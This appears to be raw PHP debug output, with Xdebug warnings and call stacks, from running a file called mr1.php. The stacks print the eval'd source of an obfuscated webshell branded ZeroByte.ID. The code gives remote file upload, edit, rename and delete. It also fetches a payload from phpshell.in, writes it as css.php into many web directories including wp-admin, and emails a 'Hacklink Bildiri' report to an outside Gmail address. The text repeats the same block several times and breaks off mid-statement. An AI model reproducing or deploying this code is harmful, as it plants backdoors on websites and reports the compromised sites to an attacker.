';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.2721541016fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:117 not exitsdone .
( ! ) Warning: fopen(C:/wamp64/www/sites/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 125
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.2855541016fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:125
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 126
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.2878541016fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:126
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 127
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.2895541016fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:127 not exitsdone .
( ! ) Warning: fopen(C:/wamp64/www/css/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 135
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
